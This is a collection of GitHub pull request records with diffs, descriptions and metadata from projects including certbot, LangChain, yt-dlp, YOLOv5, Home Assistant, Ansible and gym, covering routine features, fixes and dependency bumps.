Reverter object. @@ -554,7 +554,7 @@ def view_config_changes(config): """ rev = reverter.Reverter(config) rev.recovery_routine() - rev.view_config_changes() + rev.view_config_changes(num) def _save_chain(chain_pem, chain_path): diff --git a/letsencrypt/reverter.py b/letsencrypt/reverter.py index 863074374ce..ea54a91ee22 100644 --- a/letsencrypt/reverter.py +++ b/letsencrypt/reverter.py @@ -94,7 +94,7 @@ def rollback_checkpoints(self, rollback=1): "Unable to load checkpoint during rollback") rollback -= 1 - def view_config_changes(self, for_logging=False): + def view_config_changes(self, for_logging=False, num=None): """Displays all saved checkpoints. All checkpoints are printed by @@ -107,7 +107,8 @@ def view_config_changes(self, for_logging=False): """ backups = os.listdir(self.config.backup_dir) backups.sort(reverse=True) - + if num: + backups = backups[:num] if not backups: logger.info("The Let's Encrypt client has not saved any backups " "of your configuration")
Refers to #2497. You can now pass a number on the command line to limit how many past config changes are shown.
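A minimal sketch of the limiting behaviour this adds, assuming a directory of checkpoint backups named so that sorting newest-first works; the helper name and path below are illustrative, not part of certbot.

```python
import os

def list_recent_checkpoints(backup_dir, num=None):
    """Return checkpoint names, newest first, optionally limited to `num` entries."""
    backups = sorted(os.listdir(backup_dir), reverse=True)
    if num:
        # same slicing the PR adds to Reverter.view_config_changes
        backups = backups[:num]
    return backups

# e.g. show only the 5 most recent configuration checkpoints:
# list_recent_checkpoints("/var/lib/letsencrypt/backups", num=5)
```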
https://api.github.com/repos/certbot/certbot/pulls/2498
2016-02-18T02:35:56Z
2016-03-12T02:07:07Z
2016-03-12T02:07:07Z
2016-05-06T19:22:01Z
663
certbot/certbot
643
fix makefile help
diff --git a/Makefile b/Makefile index 5214f2fa1cbc90..64ed1a29efdf72 100644 --- a/Makefile +++ b/Makefile @@ -43,7 +43,12 @@ spell_fix: help: @echo '----' - @echo 'coverage - run unit tests and generate coverage report' + @echo 'clean - run docs_clean and api_docs_clean' @echo 'docs_build - build the documentation' @echo 'docs_clean - clean the documentation build artifacts' @echo 'docs_linkcheck - run linkchecker on the documentation' + @echo 'api_docs_build - build the API Reference documentation' + @echo 'api_docs_clean - clean the API Reference documentation build artifacts' + @echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation' + @echo 'spell_check - run codespell on the project' + @echo 'spell_fix - run codespell on the project and fix the errors' \ No newline at end of file diff --git a/libs/langchain/Makefile b/libs/langchain/Makefile index ba27b07f37690b..db4b8c089b893a 100644 --- a/libs/langchain/Makefile +++ b/libs/langchain/Makefile @@ -92,15 +92,24 @@ spell_fix: ###################### help: - @echo '----' - @echo 'coverage - run unit tests and generate coverage report' + @echo '====================' + @echo '-- DOCUMENTATION --' + @echo 'clean - run docs_clean and api_docs_clean' @echo 'docs_build - build the documentation' @echo 'docs_clean - clean the documentation build artifacts' @echo 'docs_linkcheck - run linkchecker on the documentation' + @echo 'api_docs_build - build the API Reference documentation' + @echo 'api_docs_clean - clean the API Reference documentation build artifacts' + @echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation' + @echo '-- LINTING --' @echo 'format - run code formatters' @echo 'lint - run linters' + @echo 'spell_check - run codespell on the project' + @echo 'spell_fix - run codespell on the project and fix the errors' + @echo '-- TESTS --' + @echo 'coverage - run unit tests and generate coverage report' @echo 'test - run unit tests' - @echo 'tests - run unit tests' + @echo 'tests - run unit tests (alias for "make test")' @echo 'test TEST_FILE=<test_file> - run all tests in file' @echo 'extended_tests - run only extended unit tests' @echo 'test_watch - run unit tests in watch mode'
Fixed the `makefile` help. It was not up-to-date. @baskaryan
https://api.github.com/repos/langchain-ai/langchain/pulls/8723
2023-08-03T22:38:57Z
2023-08-04T19:37:01Z
2023-08-04T19:37:01Z
2023-08-04T20:05:28Z
674
langchain-ai/langchain
43,392
elasticsearch[patch]: fix integration tests for release
diff --git a/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py b/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py index 79f9d8ef1d511a..59c02449b25970 100644 --- a/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py +++ b/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py @@ -1,5 +1,6 @@ """Test ElasticsearchRetriever functionality.""" +import os import re import uuid from typing import Any, Dict @@ -77,11 +78,19 @@ def test_init_url(self, index_name: str) -> None: def body_func(query: str) -> Dict: return {"query": {"match": {text_field: {"query": query}}}} + es_url = os.environ.get("ES_URL", "http://localhost:9200") + cloud_id = os.environ.get("ES_CLOUD_ID") + api_key = os.environ.get("ES_API_KEY") + + config = ( + {"cloud_id": cloud_id, "api_key": api_key} if cloud_id else {"url": es_url} + ) + retriever = ElasticsearchRetriever.from_es_params( - url="http://localhost:9200", index_name=index_name, body_func=body_func, content_field=text_field, + **config, # type: ignore[arg-type] ) index_test_data(retriever.es_client, index_name, text_field)
https://api.github.com/repos/langchain-ai/langchain/pulls/18980
2024-03-12T17:11:25Z
2024-03-12T17:22:08Z
2024-03-12T17:22:08Z
2024-03-12T17:24:25Z
340
langchain-ai/langchain
42,956
[utils] `traverse_obj`: Allow unbranching using `all` and `any`
diff --git a/test/test_traversal.py b/test/test_traversal.py index 3b247d0597b..0b2f3fb5dac 100644 --- a/test/test_traversal.py +++ b/test/test_traversal.py @@ -377,3 +377,35 @@ def test_traversal_xml_etree(self): 'special transformations should act on current element' assert traverse_obj(etree, ('country', 0, ..., 'text()', {int_or_none})) == [1, 2008, 141100], \ 'special transformations should act on current element' + + def test_traversal_unbranching(self): + assert traverse_obj(_TEST_DATA, [(100, 1.2), all]) == [100, 1.2], \ + '`all` should give all results as list' + assert traverse_obj(_TEST_DATA, [(100, 1.2), any]) == 100, \ + '`any` should give the first result' + assert traverse_obj(_TEST_DATA, [100, all]) == [100], \ + '`all` should give list if non branching' + assert traverse_obj(_TEST_DATA, [100, any]) == 100, \ + '`any` should give single item if non branching' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100), all]) == [100], \ + '`all` should filter `None` and empty dict' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100), any]) == 100, \ + '`any` should filter `None` and empty dict' + assert traverse_obj(_TEST_DATA, [{ + 'all': [('dict', 'None', 100, 1.2), all], + 'any': [('dict', 'None', 100, 1.2), any], + }]) == {'all': [100, 1.2], 'any': 100}, \ + '`all`/`any` should apply to each dict path separately' + assert traverse_obj(_TEST_DATA, [{ + 'all': [('dict', 'None', 100, 1.2), all], + 'any': [('dict', 'None', 100, 1.2), any], + }], get_all=False) == {'all': [100, 1.2], 'any': 100}, \ + '`all`/`any` should apply to dict regardless of `get_all`' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), all, {float}]) is None, \ + '`all` should reset branching status' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), any, {float}]) is None, \ + '`any` should reset branching status' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), all, ..., {float}]) == [1.2], \ + '`all` should allow further branching' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 'urls', 'data'), any, ..., 'index']) == [0, 1], \ + '`any` should allow further branching' diff --git a/yt_dlp/utils/traversal.py b/yt_dlp/utils/traversal.py index 8938f4c7829..926a3d0a139 100644 --- a/yt_dlp/utils/traversal.py +++ b/yt_dlp/utils/traversal.py @@ -228,6 +228,15 @@ def apply_path(start_obj, path, test_type): if not casesense and isinstance(key, str): key = key.casefold() + if key in (any, all): + has_branched = False + filtered_objs = (obj for obj in objs if obj not in (None, {})) + if key is any: + objs = (next(filtered_objs, None),) + else: + objs = (list(filtered_objs),) + continue + if __debug__ and callable(key): # Verify function signature inspect.signature(key).bind(None, None)
**IMPORTANT**: PRs without the template will be CLOSED ### Description of your *pull request* and other information <!-- Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible --> Allow resetting branch status using `any` and `all` to give a single or all results from the current pool. Especially useful in dict traversal. Soft deprecates `get_all`, since `any` and `all` serve the same purpose but inline rather than globally. <details open><summary>Template</summary> <!-- OPEN is intentional --> <!-- # PLEASE FOLLOW THE GUIDE BELOW - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x]) - Use *Preview* tab to see how your *pull request* will actually look like --> ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions) - [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) ### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check all of the following options that apply: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) ### What is the purpose of your *pull request*? - [x] Core bug fix/improvement </details>
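A small usage sketch of the unbranching behaviour described above, assuming a yt-dlp build that includes this change; the sample dict is illustrative.

```python
from yt_dlp.utils import traverse_obj

data = {'dict': {}, 'none': None, 'int': 100, 'float': 1.2}

# `all` collapses the branch into a single list, filtering out None and empty dicts
assert traverse_obj(data, [('dict', 'none', 'int', 'float'), all]) == [100, 1.2]

# `any` collapses the branch into the first non-empty result
assert traverse_obj(data, [('dict', 'none', 'int', 'float'), any]) == 100
```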
https://api.github.com/repos/yt-dlp/yt-dlp/pulls/9571
2024-03-30T11:15:41Z
2024-03-30T18:54:44Z
2024-03-30T18:54:43Z
2024-03-30T18:54:47Z
934
yt-dlp/yt-dlp
7,354
Updated cache v0.2 with `hashlib`
diff --git a/utils/datasets.py b/utils/datasets.py index 36416b14e13..882c7764c4a 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -1,6 +1,7 @@ # Dataset utils and dataloaders import glob +import hashlib import logging import math import os @@ -36,9 +37,12 @@ break -def get_hash(files): - # Returns a single hash value of a list of files - return sum(os.path.getsize(f) for f in files if os.path.isfile(f)) +def get_hash(paths): + # Returns a single hash value of a list of paths (files or dirs) + size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes + h = hashlib.md5(str(size).encode()) # hash sizes + h.update(''.join(paths).encode()) # hash paths + return h.hexdigest() # return hash def exif_size(img): @@ -383,7 +387,7 @@ def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, r cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels if cache_path.is_file(): cache, exists = torch.load(cache_path), True # load - if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed + if cache['hash'] != get_hash(self.label_files + self.img_files): # changed cache, exists = self.cache_labels(cache_path, prefix), False # re-cache else: cache, exists = self.cache_labels(cache_path, prefix), False # cache @@ -501,9 +505,9 @@ def cache_labels(self, path=Path('./labels.cache'), prefix=''): x['hash'] = get_hash(self.label_files + self.img_files) x['results'] = nf, nm, ne, nc, i + 1 - x['version'] = 0.1 # cache version + x['version'] = 0.2 # cache version try: - torch.save(x, path) # save for next time + torch.save(x, path) # save cache for next time logging.info(f'{prefix}New cache created: {path}') except Exception as e: logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
Possible fix for https://github.com/ultralytics/yolov5/issues/3349 This PR increments the cache file version to 0.2 and uses a new hashlib-based solution which detects changes in dataset contents **and location**, recaching on any changes in either. ## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Improved dataset hashing for better cache validation. ### 📊 Key Changes - Modified the `get_hash` function to compute hashes based on paths (files or directories) instead of just file sizes. - Hash now includes both the cumulative size and the actual paths of the dataset for a unique identifier. - Removed check for 'version' in cache; now solely relies on the new hashing method to validate the cache. ### 🎯 Purpose & Impact - **Enhanced Accuracy:** The new hashing method provides a more robust way to detect changes in the dataset, reducing the risk of using outdated cache entries. - **Increased Reliability:** The combination of size and path in the hash helps prevent false cache invalidation, ensuring that cache is only rebuilt when necessary. - **User Experience:** Users may observe faster setup times for repeat training sessions due to fewer unnecessary cache rebuilds.
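For reference, the hashing idea described above boils down to feeding the cumulative file size and the joined path strings into an MD5; this sketch mirrors the `get_hash` in the diff, with the example call kept hypothetical.

```python
import hashlib
import os

def get_hash(paths):
    # Hash the cumulative size of all existing paths plus the path strings themselves,
    # so either editing or moving the dataset invalidates the cache
    size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))
    h = hashlib.md5(str(size).encode())
    h.update(''.join(paths).encode())
    return h.hexdigest()

# e.g. cache_key = get_hash(label_files + img_files)
```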
https://api.github.com/repos/ultralytics/yolov5/pulls/3350
2021-05-26T11:31:18Z
2021-05-26T12:26:52Z
2021-05-26T12:26:52Z
2024-01-19T18:08:48Z
594
ultralytics/yolov5
25,367
Update pyTibber to 0.21.7
diff --git a/homeassistant/components/tibber/manifest.json b/homeassistant/components/tibber/manifest.json index b32c74fb5b0c56..2f5927442a2d4c 100644 --- a/homeassistant/components/tibber/manifest.json +++ b/homeassistant/components/tibber/manifest.json @@ -3,7 +3,7 @@ "domain": "tibber", "name": "Tibber", "documentation": "https://www.home-assistant.io/integrations/tibber", - "requirements": ["pyTibber==0.21.6"], + "requirements": ["pyTibber==0.21.7"], "codeowners": ["@danielhiversen"], "quality_scale": "silver", "config_flow": true, diff --git a/requirements_all.txt b/requirements_all.txt index c8986b16a54740..d5ddb1acb69d73 100644 --- a/requirements_all.txt +++ b/requirements_all.txt @@ -1350,7 +1350,7 @@ pyRFXtrx==0.27.0 # pySwitchmate==0.4.6 # homeassistant.components.tibber -pyTibber==0.21.6 +pyTibber==0.21.7 # homeassistant.components.dlink pyW215==0.7.0 diff --git a/requirements_test_all.txt b/requirements_test_all.txt index bbbdd62480943e..915be051b3bc64 100644 --- a/requirements_test_all.txt +++ b/requirements_test_all.txt @@ -836,7 +836,7 @@ pyMetno==0.9.0 pyRFXtrx==0.27.0 # homeassistant.components.tibber -pyTibber==0.21.6 +pyTibber==0.21.7 # homeassistant.components.nextbus py_nextbusnext==0.1.5
Signed-off-by: Daniel Hjelseth Høyer <github@dahoiv.net> <!-- You are amazing! Thanks for contributing to our project! Please, DO NOT DELETE ANY TEXT from this template! (unless instructed). --> ## Breaking change <!-- If your PR contains a breaking change for existing users, it is important to tell them what breaks, how to make it work again and why we did this. This piece of text is published with the release notes, so it helps if you write it towards our users, not us. Note: Remove this section if this PR is NOT a breaking change. --> ## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> Update tibber lib https://github.com/Danielhiversen/pyTibber/compare/0.21.6...0.21.7 ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [x] Dependency upgrade - [ ] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Breaking change (fix/feature causing existing functionality to break) - [ ] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [x] Local tests pass. **Your PR cannot be merged unless tests pass** - [x] There is no commented out code in this PR. - [x] I have followed the [development checklist][dev-checklist] - [x] The code has been formatted using Black (`black --fast homeassistant tests`) - [ ] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. The integration reached or maintains the following [Integration Quality Scale][quality-scale]: <!-- The Integration Quality Scale scores an integration on the code quality and user experience. Each level of the quality scale consists of a list of requirements. We highly recommend getting your integration scored! 
--> - [ ] No score or internal - [ ] 🥈 Silver - [ ] 🥇 Gold - [ ] 🏆 Platinum <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html [manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html [quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html [docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/63663
2022-01-08T10:59:11Z
2022-01-08T11:56:33Z
2022-01-08T11:56:33Z
2022-01-09T12:01:51Z
450
home-assistant/core
39,376
Fix gathering facts in run_once play
diff --git a/lib/ansible/executor/play_iterator.py b/lib/ansible/executor/play_iterator.py index faa54254623777..aaaa59697ba82e 100644 --- a/lib/ansible/executor/play_iterator.py +++ b/lib/ansible/executor/play_iterator.py @@ -169,6 +169,9 @@ def __init__(self, inventory, play, play_context, variable_manager, all_vars, st fact_path = self._play.fact_path setup_block = Block(play=self._play) + # Gathering facts with run_once would copy the facts from one host to + # the others. + setup_block.run_once = False setup_task = Task(block=setup_block) setup_task.action = 'setup' setup_task.name = 'Gathering Facts' diff --git a/test/integration/targets/gathering_facts/runme.sh b/test/integration/targets/gathering_facts/runme.sh index e4c7b3844a19b9..4baf8379e35bce 100755 --- a/test/integration/targets/gathering_facts/runme.sh +++ b/test/integration/targets/gathering_facts/runme.sh @@ -5,3 +5,5 @@ set -eux # ANSIBLE_CACHE_PLUGINS=cache_plugins/ ANSIBLE_CACHE_PLUGIN=none ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" #ANSIBLE_CACHE_PLUGIN=base ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" + +ANSIBLE_GATHERING=smart ansible-playbook test_run_once.yml -i ../../inventory -v "$@" diff --git a/test/integration/targets/gathering_facts/test_run_once.yml b/test/integration/targets/gathering_facts/test_run_once.yml new file mode 100644 index 00000000000000..88ea155ddd29ee --- /dev/null +++ b/test/integration/targets/gathering_facts/test_run_once.yml @@ -0,0 +1,28 @@ +--- +- hosts: facthost1 + gather_facts: no + tasks: + - name: install test local facts + copy: + src: uuid.fact + dest: /etc/ansible/facts.d/ + mode: 0755 + +- hosts: facthost1,facthost2 + gather_facts: yes + run_once: yes + tasks: + - block: + - name: 'Check the same host is used' + assert: + that: 'hostvars.facthost1.ansible_fqdn == hostvars.facthost2.ansible_fqdn' + msg: 'This test requires 2 inventory hosts referring to the same host.' + - name: "Check that run_once doesn't prevent fact gathering (#39453)" + assert: + that: 'hostvars.facthost1.ansible_local.uuid != hostvars.facthost2.ansible_local.uuid' + msg: "{{ 'Same value for ansible_local.uuid on both hosts: ' ~ hostvars.facthost1.ansible_local.uuid }}" + always: + - name: remove test local facts + file: + path: /etc/ansible/facts.d/uuid.fact + state: absent diff --git a/test/integration/targets/gathering_facts/uuid.fact b/test/integration/targets/gathering_facts/uuid.fact new file mode 100644 index 00000000000000..79e3f62677ec81 --- /dev/null +++ b/test/integration/targets/gathering_facts/uuid.fact @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + + +import json +import uuid + + +# return a random string +print(json.dumps(str(uuid.uuid4())))
##### SUMMARY When facts have to be gathered in a play with run_once==True, the facts are gathered on only one host and copied to the others. This may cause facts such as `ansible_fqdn` to be the same on all the hosts. <!--- If you are fixing an existing issue, please include "Fixes #nnn" in your commit message and your description; but you should still explain what the change does.--> Fixes #39312 ##### ISSUE TYPE - Bugfix Pull Request ##### COMPONENT NAME lib/ansible/executor/play_iterator.py ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes below --> ``` ansible 2.6.0 (devel c8a9b411bc) last updated 2018/04/27 22:35:51 (GMT +200) config file = /etc/ansible/ansible.cfg configured module search path = ['/home/kael/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/kael/dev/ansible/lib/ansible executable location = /home/kael/dev/ansible/venv/bin/ansible python version = 3.6.5rc1 (default, Mar 14 2018, 06:54:23) [GCC 7.3.0] ``` ##### ADDITIONAL INFORMATION <!--- Include additional information to help people understand the change here. For bugs that don't have a linked bug report, a step-by-step reproduction of the problem is helpful. --> <!--- Paste verbatim command output below, e.g. before and after your change -->
https://api.github.com/repos/ansible/ansible/pulls/39453
2018-04-27T20:40:53Z
2018-05-04T19:33:33Z
2018-05-04T19:33:33Z
2019-05-07T16:39:30Z
873
ansible/ansible
49,039
Text space
diff --git a/gym/spaces/__init__.py b/gym/spaces/__init__.py index 1a872285d6f..833e0818c2f 100644 --- a/gym/spaces/__init__.py +++ b/gym/spaces/__init__.py @@ -15,6 +15,7 @@ from gym.spaces.multi_binary import MultiBinary from gym.spaces.multi_discrete import MultiDiscrete from gym.spaces.space import Space +from gym.spaces.text import Text from gym.spaces.tuple import Tuple from gym.spaces.utils import flatdim, flatten, flatten_space, unflatten @@ -22,6 +23,7 @@ "Space", "Box", "Discrete", + "Text", "Graph", "GraphInstance", "MultiDiscrete", diff --git a/gym/spaces/text.py b/gym/spaces/text.py new file mode 100644 index 00000000000..416d3e71790 --- /dev/null +++ b/gym/spaces/text.py @@ -0,0 +1,123 @@ +"""Implementation of a space that represents textual strings.""" +from typing import Any, FrozenSet, List, Optional, Set, Tuple, Union + +import numpy as np + +from gym.spaces.space import Space +from gym.utils import seeding + +alphanumeric: FrozenSet[str] = frozenset( + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" +) + + +class Text(Space[str]): + r"""A space representing a string comprised of characters from a given charset. + + Example:: + >>> # {"", "B5", "hello", ...} + >>> Text(5) + >>> # {"0", "42", "0123456789", ...} + >>> import string + >>> Text(min_length = 1, + ... max_length = 10, + ... charset = string.digits) + """ + + def __init__( + self, + max_length: int, + *, + min_length: int = 0, + charset: Union[Set[str], str] = alphanumeric, + seed: Optional[Union[int, seeding.RandomNumberGenerator]] = None, + ): + r"""Constructor of :class:`Text` space. + + Both bounds for text length are inclusive. + + Args: + min_length (int): Minimum text length (in characters). + max_length (int): Maximum text length (in characters). + charset (Union[set, SupportsIndex]): Character set, defaults to the lower and upper english alphabet plus latin digits. + seed: The seed for sampling from the space. + """ + assert np.issubdtype( + type(min_length), np.integer + ), f"Expects the min_length to be an integer, actual type: {type(min_length)}" + assert np.issubdtype( + type(max_length), np.integer + ), f"Expects the max_length to be an integer, actual type: {type(max_length)}" + assert ( + 0 <= min_length + ), f"Minimum text length must be non-negative, actual value: {min_length}" + assert ( + min_length <= max_length + ), f"The min_length must be less than or equal to the max_length, min_length: {min_length}, max_length: {max_length}" + + self.min_length: int = int(min_length) + self.max_length: int = int(max_length) + self.charset: FrozenSet[str] = frozenset(charset) + self._charlist: List[str] = list(charset) + self._charset_str: str = "".join(sorted(self._charlist)) + + # As the shape is dynamic (between min_length and max_length) then None + super().__init__(dtype=str, seed=seed) + + def sample( + self, mask: Optional[Tuple[Optional[int], Optional[np.ndarray]]] = None + ) -> str: + """Generates a single random sample from this space with by default a random length between `min_length` and `max_length` and sampled from the `charset`. + + Args: + mask: An optional tuples of length and mask for the text. + The length is expected to be between the `min_length` and `max_length` otherwise a random integer between `min_length` and `max_length` is selected. 
+ For the mask, we expect a numpy array of length of the charset passed with dtype == np.int8 + + Returns: + A sampled string from the space + """ + if mask is not None: + length, charlist_mask = mask + if length is not None: + assert self.min_length <= length <= self.max_length + + if charlist_mask is not None: + assert isinstance(charlist_mask, np.ndarray) + assert charlist_mask.dtype is np.int8 + assert charlist_mask.shape == (len(self._charlist),) + else: + length, charlist_mask = None, None + + if length is None: + length = self.np_random.randint(self.min_length, self.max_length + 1) + + if charlist_mask is None: + string = self.np_random.choice(self._charlist, size=length) + else: + masked_charlist = self._charlist[np.where(mask)[0]] + string = self.np_random.choice(masked_charlist, size=length) + + return "".join(string) + + def contains(self, x: Any) -> bool: + """Return boolean specifying if x is a valid member of this space.""" + if isinstance(x, str): + if self.min_length <= len(x) <= self.max_length: + return all(c in self.charset for c in x) + return False + + def __repr__(self) -> str: + """Gives a string representation of this space.""" + return ( + f"Text({self.min_length}, {self.max_length}, charset={self._charset_str})" + ) + + def __eq__(self, other) -> bool: + """Check whether ``other`` is equivalent to this instance.""" + return ( + isinstance(other, Text) + and self.min_length == other.min_length + and self.max_length == other.max_length + and self.charset == other.charset + ) diff --git a/gym/version.py b/gym/version.py index 21d74bdf3c5..1ae872fda0d 100644 --- a/gym/version.py +++ b/gym/version.py @@ -1 +1 @@ -VERSION = "0.24.1" +VERSION = "0.25.0" diff --git a/tests/spaces/test_spaces.py b/tests/spaces/test_spaces.py index b998c8362d5..b58ab6c792c 100644 --- a/tests/spaces/test_spaces.py +++ b/tests/spaces/test_spaces.py @@ -1,14 +1,24 @@ import copy import json # note: ujson fails this test due to float equality import pickle +import string import tempfile from typing import List, Union import numpy as np import pytest -from gym import Space -from gym.spaces import Box, Dict, Discrete, Graph, MultiBinary, MultiDiscrete, Tuple +from gym.spaces import ( + Box, + Dict, + Discrete, + Graph, + MultiBinary, + MultiDiscrete, + Space, + Text, + Tuple, +) @pytest.mark.parametrize( @@ -45,6 +55,8 @@ Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=Discrete(5)), Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_roundtripping(space): @@ -102,6 +114,8 @@ def test_roundtripping(space): Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=Discrete(5)), Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_equality(space): @@ -144,6 +158,10 @@ def test_equality(space): ), Graph(node_space=Discrete(5), edge_space=None), ), + ( + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), + ), ], ) def test_inequality(spaces): @@ -466,6 +484,10 @@ def test_composite_space_sample_mask(space, mask): ), Graph(node_space=Discrete(5), edge_space=None), ), + ( + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), + ), ], ) def test_class_inequality(spaces): @@ -584,6 +606,8 @@ def test_box_dtype_check(): 
Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_returns_list(space): @@ -647,6 +671,8 @@ def sample_equal(sample1, sample2): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_reproducibility(space): @@ -691,6 +717,8 @@ def test_seed_reproducibility(space): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_subspace_incorrelated(space): @@ -958,6 +986,8 @@ def test_box_legacy_state_pickling(): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_pickle(space):
A completion of https://github.com/openai/gym/pull/2908 to allow it to be merged for `v0.25.0`. For the complete details of the Text space, see the above PR. This PR adds masking on top of it: `sample` takes an optional tuple of an optional text length and a character mask, following a similar specification to the other spaces' masks.
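An illustrative usage sketch, assuming a gym build that ships this `Text` space; the bounds and charset below are arbitrary.

```python
import string
from gym.spaces import Text

# Strings of 1-10 characters drawn from the digits 0-9
space = Text(min_length=1, max_length=10, charset=string.digits)

sample = space.sample()           # e.g. "4076"
assert space.contains(sample)
assert not space.contains("abc")  # letters are outside the digit charset
```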
https://api.github.com/repos/openai/gym/pulls/2959
2022-07-11T13:05:13Z
2022-07-11T15:39:05Z
2022-07-11T15:39:05Z
2022-07-11T15:39:05Z
2,585
openai/gym
5,583
Fix dependencies and styles
